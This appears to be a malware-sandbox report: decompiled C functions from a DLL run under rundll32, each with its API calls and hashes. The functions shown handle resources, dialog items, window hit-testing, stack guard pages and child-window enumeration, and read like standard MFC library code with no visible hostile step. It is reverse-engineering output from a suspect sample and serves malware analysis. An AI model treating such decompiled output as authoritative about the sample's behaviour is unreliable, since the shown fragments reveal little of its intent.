                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 3e1abaff2b2b53109e12cf8cb9fdd6ecea71e19850326222ef182825037473a3
                                                                                                            • Instruction ID: a1aac842a28fd1c9b1a5d11719d9853ed47685f9db5387583b2c03217e3948c7
                                                                                                            • Opcode Fuzzy Hash: 3e1abaff2b2b53109e12cf8cb9fdd6ecea71e19850326222ef182825037473a3
                                                                                                            • Instruction Fuzzy Hash: A641F5F1D002669FCB20EF698C8489F7AB4EB417A47124129FA24AE151D734DDE0DB91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 82%
                                                                                                            			E100071BF(intOrPtr* __ecx, void* _a4, signed int _a8, intOrPtr _a12) {
                                                                                                            				void* _v8;
                                                                                                            				void* _v12;
                                                                                                            				intOrPtr _v16;
                                                                                                            				signed int _v20;
                                                                                                            				void* _t59;
                                                                                                            				signed int _t61;
                                                                                                            				signed int _t62;
                                                                                                            				void* _t64;
                                                                                                            				int* _t72;
                                                                                                            				struct HWND__* _t73;
                                                                                                            				intOrPtr _t78;
                                                                                                            				struct HRSRC__* _t81;
                                                                                                            				void* _t82;
                                                                                                            				void* _t86;
                                                                                                            				void* _t88;
                                                                                                            				void* _t89;
                                                                                                            				intOrPtr _t90;
                                                                                                            				void* _t93;
                                                                                                            				intOrPtr _t95;
                                                                                                            				intOrPtr _t101;
                                                                                                            				intOrPtr _t103;
                                                                                                            				struct HINSTANCE__* _t105;
                                                                                                            				intOrPtr* _t106;
                                                                                                            				void* _t107;
                                                                                                            
                                                                                                            				_t106 = __ecx;
                                                                                                            				_v8 = 0;
                                                                                                            				_v12 = 0;
                                                                                                            				if(_a8 != 0) {
                                                                                                            					_t105 =  *(E100373B5() + 0xc);
                                                                                                            					_t81 = FindResourceA(_t105, _a8, 0xf0);
                                                                                                            					if(_t81 != 0) {
                                                                                                            						_t82 = LoadResource(_t105, _t81);
                                                                                                            						_v12 = _t82;
                                                                                                            						if(_t82 == 0) {
                                                                                                            							return 0;
                                                                                                            						}
                                                                                                            						_v8 = LockResource(_t82);
                                                                                                            					}
                                                                                                            				}
                                                                                                            				__eflags = _v8;
                                                                                                            				_t86 = _a4;
                                                                                                            				_t103 = _a12;
                                                                                                            				_v16 = 1;
                                                                                                            				if(_v8 != 0) {
                                                                                                            					_t78 =  *((intOrPtr*)( *_t106 + 0x1c))(_t86, _v8, _t103);
                                                                                                            					__eflags = _v12;
                                                                                                            					_v16 = _t78;
                                                                                                            					if(_v12 != 0) {
                                                                                                            						FreeResource(_v12);
                                                                                                            					}
                                                                                                            				}
                                                                                                            				_t59 =  *(_t86 + 0x48);
                                                                                                            				__eflags = _t59;
                                                                                                            				if(_t59 == 0) {
                                                                                                            					L25:
                                                                                                            					return _v16;
                                                                                                            				} else {
                                                                                                            					_t88 =  *(_t59 + 0x40);
                                                                                                            					_a8 = _a8 & 0x00000000;
                                                                                                            					__eflags = _t88;
                                                                                                            					_a4 = _t88;
                                                                                                            					_v12 = _t88;
                                                                                                            					if(_t88 != 0) {
                                                                                                            						_a8 =  *(E10006D96( &_a4));
                                                                                                            					}
                                                                                                            					_t61 = 0;
                                                                                                            					__eflags =  *(_t103 + 8);
                                                                                                            					_v8 = 0;
                                                                                                            					if( *(_t103 + 8) > 0) {
                                                                                                            						do {
                                                                                                            							_t89 = _a8;
                                                                                                            							__eflags = _t89;
                                                                                                            							if(_t89 == 0) {
                                                                                                            								L17:
                                                                                                            								_t90 =  *((intOrPtr*)(_t103 + 0xc));
                                                                                                            								_t62 = _t61 << 3;
                                                                                                            								__eflags =  *(_t62 + _t90);
                                                                                                            								_v20 = _t62;
                                                                                                            								if( *(_t62 + _t90) != 0) {
                                                                                                            									_t107 = E1001F77E(0xc);
                                                                                                            									__eflags = _t107;
                                                                                                            									if(_t107 == 0) {
                                                                                                            										_t107 = 0;
                                                                                                            										__eflags = 0;
                                                                                                            									} else {
                                                                                                            										_t72 =  *((intOrPtr*)(_t103 + 0xc)) + _v20;
                                                                                                            										_t73 = GetDlgItem( *(_t86 + 0x1c),  *_t72);
                                                                                                            										 *(_t107 + 4) =  *(_t107 + 4) & 0x00000000;
                                                                                                            										 *(_t107 + 8) = _t72[1];
                                                                                                            										_t103 = _a12;
                                                                                                            										 *_t107 = _t73;
                                                                                                            									}
                                                                                                            									_t93 =  *(_t86 + 0x48) + 0x3c;
                                                                                                            									__eflags = _v12;
                                                                                                            									_push(_t107);
                                                                                                            									if(__eflags == 0) {
                                                                                                            										E1001E118(_t93, __eflags);
                                                                                                            									} else {
                                                                                                            										_push(_v12);
                                                                                                            										E1001DF55(_t93);
                                                                                                            									}
                                                                                                            								}
                                                                                                            								goto L24;
                                                                                                            							}
                                                                                                            							_t95 =  *((intOrPtr*)(_t89 + 4));
                                                                                                            							_t101 =  *((intOrPtr*)(_t103 + 0xc));
                                                                                                            							__eflags =  *((intOrPtr*)(_t95 + 0x28)) -  *((intOrPtr*)(_t101 + _t61 * 8));
                                                                                                            							if( *((intOrPtr*)(_t95 + 0x28)) !=  *((intOrPtr*)(_t101 + _t61 * 8))) {
                                                                                                            								goto L17;
                                                                                                            							} else {
                                                                                                            								_t64 = _a4;
                                                                                                            								__eflags = _t64;
                                                                                                            								_v12 = _t64;
                                                                                                            								if(_t64 == 0) {
                                                                                                            									_a8 = _a8 & 0x00000000;
                                                                                                            								} else {
                                                                                                            									_a8 =  *(E10006D96( &_a4));
                                                                                                            								}
                                                                                                            							}
                                                                                                            							L24:
                                                                                                            							_t61 = _v8 + 1;
                                                                                                            							__eflags = _t61 -  *(_t103 + 8);
                                                                                                            							_v8 = _t61;
                                                                                                            						} while (_t61 <  *(_t103 + 8));
                                                                                                            					}
                                                                                                            					goto L25;
                                                                                                            				}
                                                                                                            			}




























                                                                                                            APIs
                                                                                                            • FindResourceA.KERNEL32(?,?,000000F0), ref: 100071E8
                                                                                                            • LoadResource.KERNEL32(?,00000000), ref: 100071F4
                                                                                                            • LockResource.KERNEL32(00000000), ref: 10007209
                                                                                                            • FreeResource.KERNEL32(00000000), ref: 1000723C
                                                                                                            • GetDlgItem.USER32 ref: 100072E6
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Resource$FindFreeItemLoadLock
                                                                                                            • String ID:
                                                                                                            • API String ID: 996205394-0
                                                                                                            • Opcode ID: a2403dcbaf47a98d0818dc6bf856e1e017887b1b7f9ace347811d0ac3dce61fc
                                                                                                            • Instruction ID: 3ddb78cc740fa9bd2d00af88598f625c67c34797d15b04e165b588e19e6e1fdb
                                                                                                            • Opcode Fuzzy Hash: a2403dcbaf47a98d0818dc6bf856e1e017887b1b7f9ace347811d0ac3dce61fc
                                                                                                            • Instruction Fuzzy Hash: 37516B35A00209EFEB14CFA5C884A9EBBF5FF44390F508469E80A9B255D734EA41DF90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 88%
                                                                                                            			E10009B77(void* __ebx, void* __ecx) {
                                                                                                            				void* _t62;
                                                                                                            				long _t63;
                                                                                                            				void* _t76;
                                                                                                            
                                                                                                            				E10011BF0(0x1003ae2b, _t76);
                                                                                                            				_t62 =  *((intOrPtr*)(_t76 + 0xc)) + 0x2cc;
                                                                                                            				if(_t62 > 0xf) {
                                                                                                            					L20:
                                                                                                            					_t63 = 0;
                                                                                                            				} else {
                                                                                                            					switch( *((intOrPtr*)(( *(_t62 + 0x10009d63) & 0x000000ff) * 4 +  &M10009D3B))) {
                                                                                                            						case 0:
                                                                                                            							__eax =  *(__ebp + 0x10);
                                                                                                            							 *__eax = 2;
                                                                                                            							 *(__eax + 8) = 1;
                                                                                                            							goto L19;
                                                                                                            						case 1:
                                                                                                            							_t65 =  *((intOrPtr*)(_t76 + 0x10));
                                                                                                            							 *(_t65 + 8) =  *(_t65 + 8) | 0x0000ffff;
                                                                                                            							 *_t65 = 0xb;
                                                                                                            							goto L19;
                                                                                                            						case 2:
                                                                                                            							__esi =  *(__ebp + 0x10);
                                                                                                            							__ecx =  *(__ebp + 8);
                                                                                                            							 *__esi = 0xb;
                                                                                                            							E1000A369( *(__ebp + 8)) =  ~__eax;
                                                                                                            							asm("sbb eax, eax");
                                                                                                            							 *(__esi + 8) = __ax;
                                                                                                            							goto L19;
                                                                                                            						case 3:
                                                                                                            							__eax =  *(__ebp + 0x10);
                                                                                                            							 *(__eax + 8) =  *(__eax + 8) & 0x00000000;
                                                                                                            							 *__eax = 0xb;
                                                                                                            							goto L19;
                                                                                                            						case 4:
                                                                                                            							__eax = E100243B2();
                                                                                                            							__edx =  *__eax;
                                                                                                            							__ecx = __eax;
                                                                                                            							__eax =  *((intOrPtr*)( *__eax + 0xc))();
                                                                                                            							 *(__ebp + 0xc) = __eax;
                                                                                                            							__ecx = __ebp + 0xc;
                                                                                                            							 *(__ebp - 4) = 1;
                                                                                                            							__eax = E10006A60(__ebp + 0xc, 0xf1c0);
                                                                                                            							__esi =  *(__ebp + 0x10);
                                                                                                            							__ecx = __ebp + 0xc;
                                                                                                            							 *__esi = 8;
                                                                                                            							__eax = E10035C0F(__ebx, __ebp + 0xc, __edi, __esi, __ebp);
                                                                                                            							__ecx =  *(__ebp + 0xc);
                                                                                                            							 *(__esi + 8) = __eax;
                                                                                                            							__ecx =  *(__ebp + 0xc) + 0xfffffff0;
                                                                                                            							__eflags = __ecx;
                                                                                                            							goto L18;
                                                                                                            						case 5:
                                                                                                            							__esi =  *(__ebp + 0x10);
                                                                                                            							 *__esi = 3;
                                                                                                            							 *(__esi + 8) = GetThreadLocale();
                                                                                                            							goto L19;
                                                                                                            						case 6:
                                                                                                            							__eflags =  *(__esi + 0x58) - 0xffffffff;
                                                                                                            							if( *(__esi + 0x58) == 0xffffffff) {
                                                                                                            								_push( *(__esi + 0x1c));
                                                                                                            								__ecx = __ebp - 0x20;
                                                                                                            								E10029194(__ebp - 0x20) =  *(__esi + 0x1c);
                                                                                                            								 *( *(__esi + 0x1c) + 0x1c) = SendMessageA( *( *(__esi + 0x1c) + 0x1c), 0x138,  *(__ebp - 0x1c),  *( *(__esi + 0x1c) + 0x1c));
                                                                                                            								 *(__esi + 0x58) = GetBkColor( *(__ebp - 0x18));
                                                                                                            								__eax = GetTextColor( *(__ebp - 0x18));
                                                                                                            								__ecx = __ebp - 0x20;
                                                                                                            								 *(__esi + 0x5c) = __eax;
                                                                                                            								__eax = E100291EF(__ebp - 0x20, __eflags);
                                                                                                            							}
                                                                                                            							__eflags = __edi - 0xfffffd43;
                                                                                                            							__eax =  *(__ebp + 0x10);
                                                                                                            							 *__eax = 3;
                                                                                                            							if(__edi != 0xfffffd43) {
                                                                                                            								__esi =  *(__esi + 0x5c);
                                                                                                            							} else {
                                                                                                            								__esi =  *(__esi + 0x58);
                                                                                                            							}
                                                                                                            							 *(__eax + 8) = __esi;
                                                                                                            							goto L19;
                                                                                                            						case 7:
                                                                                                            							__eflags =  *(__esi + 0x60);
                                                                                                            							if( *(__esi + 0x60) != 0) {
                                                                                                            								L13:
                                                                                                            								__edi =  *(__ebp + 0x10);
                                                                                                            								 *__edi = 9;
                                                                                                            								__eax =  *(__esi + 0x60);
                                                                                                            								__ecx =  *__eax;
                                                                                                            								_push(__eax);
                                                                                                            								__eax =  *(__esi + 0x60);
                                                                                                            								 *(__edi + 8) =  *(__esi + 0x60);
                                                                                                            								goto L19;
                                                                                                            							} else {
                                                                                                            								__ecx =  *(__esi + 0x1c);
                                                                                                            								__eax = E100090C8( *(__esi + 0x1c));
                                                                                                            								__ecx = __esi;
                                                                                                            								__eax = E1000943B(__esi, __eax);
                                                                                                            								__eflags =  *(__esi + 0x60);
                                                                                                            								if( *(__esi + 0x60) == 0) {
                                                                                                            									goto L20;
                                                                                                            								} else {
                                                                                                            									goto L13;
                                                                                                            								}
                                                                                                            							}
                                                                                                            							goto L21;
                                                                                                            						case 8:
                                                                                                            							__eax = E100243B2();
                                                                                                            							__edx =  *__eax;
                                                                                                            							__ecx = __eax;
                                                                                                            							_t43 = __eax + 0x10; // 0x10
                                                                                                            							__esi = _t43;
                                                                                                            							 *(__ebp + 0xc) = __esi;
                                                                                                            							__edi =  *(__ebp + 0x10);
                                                                                                            							 *(__ebp - 4) =  *(__ebp - 4) & 0x00000000;
                                                                                                            							__ecx = __ebp + 0xc;
                                                                                                            							 *__edi = 8;
                                                                                                            							 *(__edi + 8) = E10035C0F(__ebx, __ebp + 0xc, __edi, __esi, __ebp);
                                                                                                            							_t50 = __esi - 0x10; // 0x0
                                                                                                            							__ecx = _t50;
                                                                                                            							L18:
                                                                                                            							__eax = E100014B0(__ecx, __edx);
                                                                                                            							L19:
                                                                                                            							_t63 = 1;
                                                                                                            							goto L21;
                                                                                                            						case 9:
                                                                                                            							goto L20;
                                                                                                            					}
                                                                                                            				}
                                                                                                            				L21:
                                                                                                            				 *[fs:0x0] =  *((intOrPtr*)(_t76 - 0xc));
                                                                                                            				return _t63;
                                                                                                            			}






                                                                                                            0x10009d38

                                                                                                            APIs
                                                                                                            • __EH_prolog.LIBCMT ref: 10009B7C
                                                                                                            • SendMessageA.USER32(?,00000138,?,?), ref: 10009C00
                                                                                                            • GetBkColor.GDI32(?), ref: 10009C09
                                                                                                            • GetTextColor.GDI32(?), ref: 10009C15
                                                                                                            • GetThreadLocale.KERNEL32(0000F1C0), ref: 10009CA7
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Color$H_prologLocaleMessageSendTextThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 741590120-0
                                                                                                            • Opcode ID: ffd68efac94681e02b946185b7585b592d7a198cf77f0b1454b8da5265c6291b
                                                                                                            • Instruction ID: 17d43df59e13e7a0fc638ef54e749073bd167348119b36b57266e85b12fc2c17
                                                                                                            • Opcode Fuzzy Hash: ffd68efac94681e02b946185b7585b592d7a198cf77f0b1454b8da5265c6291b
                                                                                                            • Instruction Fuzzy Hash: D451543590074ADFEB20DF64C88499EB7F0FF08354F21895AE8569B3A1E774A981CB91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E100344F5(void* __ecx, intOrPtr _a8) {
                                                                                                            				signed int _v7;
                                                                                                            				intOrPtr _v8;
                                                                                                            				struct tagRECT _v24;
                                                                                                            				void* _t44;
                                                                                                            				void* _t48;
                                                                                                            				void* _t52;
                                                                                                            				void* _t57;
                                                                                                            				void* _t64;
                                                                                                            				signed int _t67;
                                                                                                            				void* _t75;
                                                                                                            				void* _t76;
                                                                                                            				signed int _t78;
                                                                                                            
                                                                                                            				_t75 = __ecx;
                                                                                                            				_v8 = E100202AB(__ecx);
                                                                                                            				GetWindowRect( *(__ecx + 0x1c),  &_v24);
                                                                                                            				_t67 = GetSystemMetrics(0x21);
                                                                                                            				_t78 = GetSystemMetrics(0x20);
                                                                                                            				_t76 = E1002204B(_t75);
                                                                                                            				if((_v7 & 0x00000010) == 0) {
                                                                                                            					L5:
                                                                                                            					if(_t76 < 0xa || _t76 > 0x11) {
                                                                                                            						if(_t76 != 4) {
                                                                                                            							goto L16;
                                                                                                            						}
                                                                                                            						goto L8;
                                                                                                            					} else {
                                                                                                            						L8:
                                                                                                            						if((_v7 & 0x00000008) == 0) {
                                                                                                            							InflateRect( &_v24,  ~_t78,  ~_t67);
                                                                                                            							if((_v7 & 0x00000002) == 0) {
                                                                                                            								L16:
                                                                                                            								return _t76;
                                                                                                            							}
                                                                                                            							_t44 = _t76 - 4;
                                                                                                            							if(_t44 == 0) {
                                                                                                            								L21:
                                                                                                            								return 0xb + (0 | _a8 - _v24.bottom > 0x00000000) * 4;
                                                                                                            							}
                                                                                                            							_t48 = _t44 - 9;
                                                                                                            							if(_t48 == 0) {
                                                                                                            								return (0 | _a8 - _v24.top < 0x00000000) + (0 | _a8 - _v24.top < 0x00000000) + 0xa;
                                                                                                            							}
                                                                                                            							_t52 = _t48 - 1;
                                                                                                            							if(_t52 == 0) {
                                                                                                            								return (0 | _a8 - _v24.top < 0x00000000) + 0xb;
                                                                                                            							}
                                                                                                            							_t57 = _t52;
                                                                                                            							if(_t57 == 0) {
                                                                                                            								return ((0 | _a8 - _v24.bottom <= 0x00000000) - 0x00000001 & 0x00000005) + 0xa;
                                                                                                            							}
                                                                                                            							if(_t57 == 1) {
                                                                                                            								goto L21;
                                                                                                            							}
                                                                                                            							goto L16;
                                                                                                            						}
                                                                                                            						_t64 = 2;
                                                                                                            						return _t64;
                                                                                                            					}
                                                                                                            				}
                                                                                                            				if(_t76 == 3) {
                                                                                                            					_t76 = 2;
                                                                                                            				}
                                                                                                            				if(GetKeyState(2) >= 0) {
                                                                                                            					goto L5;
                                                                                                            				} else {
                                                                                                            					return 0;
                                                                                                            				}
                                                                                                            			}
















                                                                                                            APIs
                                                                                                              • Part of subcall function 100202AB: GetWindowLongA.USER32 ref: 100202B6
                                                                                                            • GetWindowRect.USER32 ref: 1003450F
                                                                                                            • GetSystemMetrics.USER32 ref: 1003451D
                                                                                                            • GetSystemMetrics.USER32 ref: 10034523
                                                                                                            • GetKeyState.USER32(00000002), ref: 10034540
                                                                                                            • InflateRect.USER32(?,00000000,00000000), ref: 10034573
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MetricsRectSystemWindow$InflateLongState
                                                                                                            • String ID:
                                                                                                            • API String ID: 2406722796-0
                                                                                                            • Opcode ID: ca75ff146dd13cf3a9a81e35c2b644f3561e541cec42ef1ad0753529e650aa81
                                                                                                            • Instruction ID: eebfe8686990ea06ae8873f0c24ea56f3203d68343432915ce32c001f6d4e862
                                                                                                            • Opcode Fuzzy Hash: ca75ff146dd13cf3a9a81e35c2b644f3561e541cec42ef1ad0753529e650aa81
                                                                                                            • Instruction Fuzzy Hash: 2A31D63AE0051DEFDB12DBA8C888EAE7BA5EF49291F464416D802DF193CE34F940C650
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 86%
                                                                                                            			E10010839(void* __ecx, void* __eflags) {
                                                                                                            				void* _v8;
                                                                                                            				long _v12;
                                                                                                            				long _v16;
                                                                                                            				signed char _v23;
                                                                                                            				struct _MEMORY_BASIC_INFORMATION _v44;
                                                                                                            				struct _SYSTEM_INFO _v80;
                                                                                                            				void* _v92;
                                                                                                            				void* _t29;
                                                                                                            				int _t33;
                                                                                                            				intOrPtr _t35;
                                                                                                            				void* _t43;
                                                                                                            				void* _t46;
                                                                                                            				signed int _t49;
                                                                                                            				void* _t54;
                                                                                                            				void* _t55;
                                                                                                            				void* _t62;
                                                                                                            				void* _t63;
                                                                                                            
                                                                                                            				_t29 = 4;
                                                                                                            				E10010B20(_t29, __ecx);
                                                                                                            				_t55 = _t63;
                                                                                                            				if(VirtualQuery(_t55,  &_v44, 0x1c) == 0) {
                                                                                                            					L9:
                                                                                                            					_t33 = 0;
                                                                                                            				} else {
                                                                                                            					_t46 = _v44.AllocationBase;
                                                                                                            					GetSystemInfo( &_v80);
                                                                                                            					_t49 = _v80.dwPageSize;
                                                                                                            					_t35 =  *0x1004f3e0; // 0x2
                                                                                                            					_t54 = ( !(_t49 - 1) & _t55) - _t49;
                                                                                                            					asm("sbb esi, esi");
                                                                                                            					_t62 = (( ~(_t35 - 1) & 0xfffffff1) + 0x11) * _t49 + _t46;
                                                                                                            					_v12 = _t49;
                                                                                                            					if(_t54 < _t62) {
                                                                                                            						goto L9;
                                                                                                            					} else {
                                                                                                            						if(_t35 == 1) {
                                                                                                            							_v8 = _t54;
                                                                                                            							goto L14;
                                                                                                            						} else {
                                                                                                            							_v8 = _t46;
                                                                                                            							while(VirtualQuery(_v8,  &_v44, 0x1c) != 0) {
                                                                                                            								_v8 = _v8 + _v44.RegionSize;
                                                                                                            								if((_v44.State & 0x00001000) == 0) {
                                                                                                            									continue;
                                                                                                            								} else {
                                                                                                            									_t43 = _v44.BaseAddress;
                                                                                                            									_v8 = _t43;
                                                                                                            									if((_v23 & 0x00000001) == 0) {
                                                                                                            										if(_t54 >= _t43) {
                                                                                                            											if(_t43 < _t62) {
                                                                                                            												_v8 = _t62;
                                                                                                            											}
                                                                                                            											VirtualAlloc(_v8, _v12, 0x1000, 4);
                                                                                                            											_t35 =  *0x1004f3e0; // 0x2
                                                                                                            											L14:
                                                                                                            											asm("sbb eax, eax");
                                                                                                            											_t33 = VirtualProtect(_v8, _v12, ( ~(_t35 - 1) & 0x00000103) + 1,  &_v16);
                                                                                                            										} else {
                                                                                                            											goto L9;
                                                                                                            										}
                                                                                                            									} else {
                                                                                                            										_t33 = 1;
                                                                                                            									}
                                                                                                            								}
                                                                                                            								goto L15;
                                                                                                            							}
                                                                                                            							goto L9;
                                                                                                            						}
                                                                                                            					}
                                                                                                            				}
                                                                                                            				L15:
                                                                                                            				return _t33;
                                                                                                            			}





















                                                                                                            APIs
                                                                                                            • VirtualQuery.KERNEL32(?,?,0000001C), ref: 10010853
                                                                                                            • GetSystemInfo.KERNEL32(?,?,?,0000001C), ref: 10010864
                                                                                                            • VirtualQuery.KERNEL32(?,?,0000001C,?,?,0000001C), ref: 100108AA
                                                                                                            • VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,?,0000001C), ref: 100108E8
                                                                                                            • VirtualProtect.KERNEL32(?,?,00000002,?,?,?,0000001C), ref: 1001090E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Virtual$Query$AllocInfoProtectSystem
                                                                                                            • String ID:
                                                                                                            • API String ID: 4136887677-0
                                                                                                            • Opcode ID: 71a51d1d86ecf8343d385652834c01b8084f8671a74ced250a72b247972f9a76
                                                                                                            • Instruction ID: ea62dba494344a01c7efc91e140871f3e8746f8623a2ca282db0dc9e1cf87e08
                                                                                                            • Opcode Fuzzy Hash: 71a51d1d86ecf8343d385652834c01b8084f8671a74ced250a72b247972f9a76
                                                                                                            • Instruction Fuzzy Hash: 60316D32E0425DEBEF10CBA8CD85AED7BB8EB05355F110165F981EB191DBB09A809B90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 95%
                                                                                                            			E10022C99(void* __ebx, intOrPtr __ecx, void* __eflags) {
                                                                                                            				void* _t31;
                                                                                                            				signed int _t42;
                                                                                                            				struct HWND__* _t62;
                                                                                                            				void* _t64;
                                                                                                            				void* _t69;
                                                                                                            
                                                                                                            				_t69 = __eflags;
                                                                                                            				E10011BF0(0x1003a5dc, _t64);
                                                                                                            				 *((intOrPtr*)(_t64 - 0x10)) = __ecx;
                                                                                                            				E1001FFB4(_t64 - 0x38);
                                                                                                            				E10021613(_t64 - 0x88, _t69);
                                                                                                            				 *(_t64 - 4) = 0;
                                                                                                            				_t62 = GetTopWindow( *(__ecx + 0x1c));
                                                                                                            				if(_t62 != 0) {
                                                                                                            					do {
                                                                                                            						 *(_t64 - 0x6c) = _t62;
                                                                                                            						 *(_t64 - 0x34) = GetDlgCtrlID(_t62) & 0x0000ffff;
                                                                                                            						_push(_t62);
                                                                                                            						 *((intOrPtr*)(_t64 - 0x24)) = _t64 - 0x88;
                                                                                                            						if(E10022115() == 0 || E1001FE3C(_t35, 0, 0xbd11ffff, _t64 - 0x38, 0) == 0) {
                                                                                                            							if(E1001FE3C( *((intOrPtr*)(_t64 - 0x10)),  *(_t64 - 0x34), 0xffffffff, _t64 - 0x38, 0) == 0) {
                                                                                                            								_t46 =  *((intOrPtr*)(_t64 + 0xc));
                                                                                                            								if( *((intOrPtr*)(_t64 + 0xc)) != 0) {
                                                                                                            									if((SendMessageA( *(_t64 - 0x6c), 0x87, 0, 0) & 0x00000020) == 0) {
                                                                                                            										L11:
                                                                                                            										_t46 = 0;
                                                                                                            									} else {
                                                                                                            										_t42 = E100202AB(_t64 - 0x88) & 0x0000000f;
                                                                                                            										if(_t42 == 3 || _t42 == 6 || _t42 == 7 || _t42 == 9) {
                                                                                                            											goto L11;
                                                                                                            										}
                                                                                                            									}
                                                                                                            								}
                                                                                                            								E1001FFDA(_t64 - 0x38,  *((intOrPtr*)(_t64 + 8)), _t46);
                                                                                                            							}
                                                                                                            						}
                                                                                                            						_t62 = GetWindow(_t62, 2);
                                                                                                            					} while (_t62 != 0);
                                                                                                            				}
                                                                                                            				 *(_t64 - 4) =  *(_t64 - 4) | 0xffffffff;
                                                                                                            				 *(_t64 - 0x6c) = 0;
                                                                                                            				_t31 = E10022977(_t64 - 0x88);
                                                                                                            				 *[fs:0x0] =  *((intOrPtr*)(_t64 - 0xc));
                                                                                                            				return _t31;
                                                                                                            			}









                                                                                                            APIs
                                                                                                            • __EH_prolog.LIBCMT ref: 10022C9E
                                                                                                            • GetTopWindow.USER32(?), ref: 10022CC8
                                                                                                            • GetDlgCtrlID.USER32 ref: 10022CDD
                                                                                                            • SendMessageA.USER32(?,00000087,00000000,00000000), ref: 10022D39
                                                                                                            • GetWindow.USER32(00000000,00000002), ref: 10022D77
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$CtrlH_prologMessageSend
                                                                                                            • String ID:
                                                                                                            • API String ID: 4125289812-0
                                                                                                            • Opcode ID: 19a7042d3ee7ac9ff937cd3b65bdcc34620a1ee98de378f8268fb43055ccdf2e
